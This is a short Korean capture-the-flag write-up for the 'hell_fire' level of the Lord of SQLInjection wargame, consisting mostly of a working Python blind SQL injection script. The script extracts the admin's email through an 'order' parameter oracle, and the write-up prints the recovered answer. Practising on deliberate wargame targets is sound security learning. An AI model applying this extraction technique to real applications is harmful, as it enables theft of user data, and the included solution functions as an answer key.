첫 화면이다.
Blind SQL Injection으로 풀었다.
파이썬 코드를 짜면 아래와 같다.
import requests
# Target endpoint; the probe expression is appended to the ``order`` query parameter.
URL = ('https://los.rubiya.kr/chall/'
       'hell_fire_309d5f471fbdd4722d221835380bb805.php?order=')
# Placeholder only: the real session cookie must be supplied at run time and
# never committed to source control.
PHPSESSID = 'MY_PHPSESSID'
# Marker text whose presence in the response body is the TRUE/FALSE oracle.
TRUE_PHRASE = 'score</th><tr><td>admin'
def query(payload):
    """Send one probe and report whether the response reads as TRUE.

    ``payload`` is appended verbatim to ``URL``; the request is authenticated
    only by the ``PHPSESSID`` cookie.  Returns ``True`` when ``TRUE_PHRASE``
    occurs anywhere in the response body, ``False`` otherwise.

    No ``timeout`` is passed to ``requests.get``, so a stalled connection
    blocks indefinitely; network failures propagate as ``requests``
    exceptions.  The HTTP status code is not inspected.
    """
    response = requests.get(
        URL + payload,
        cookies={'PHPSESSID': PHPSESSID},
    )
    return TRUE_PHRASE in response.text
# result: 28
def find_email_length():
    """Determine the length of admin's email by linear probing.

    Starting at 1, each candidate length is wrapped in a conditional that
    evaluates TRUE only when ``length(email)`` equals it, so exactly one
    request is issued per candidate until ``query`` reports a hit.  The loop
    has no upper bound.  Prints the length found and returns it.
    """
    template = "if(id='admin' and length(email)={}, 'id', 'score')"
    candidate = 1
    # ``query`` returns a bool, so ``not`` is the exact complement of a hit.
    while not query(template.format(candidate)):
        candidate += 1
    print('email_len: {}'.format(candidate))
    return candidate
# result: admin_secure_email@emai1.com
def find_email():
    """Recover admin's email one character at a time.

    Calls ``find_email_length`` first, then for every 1-based position tries
    each code point 0..127 via an ``ord(substr(...))`` comparison and keeps
    the first one ``query`` confirms — up to 128 requests per position.
    A position where no candidate matches is silently skipped, so the
    printed value can be shorter than the probed length.  Prints the email
    and returns ``None``.
    """
    template = "if(id='admin' and ord(substr(email,{},1))={}, 'id', 'score')"
    length = find_email_length()
    found = []
    for position in range(1, length + 1):
        for code in range(128):
            if query(template.format(position, code)):
                found.append(chr(code))
                break
    print('email: {}'.format(''.join(found)))
# Module-level call: the recovery runs as soon as this file is executed or imported.
find_email()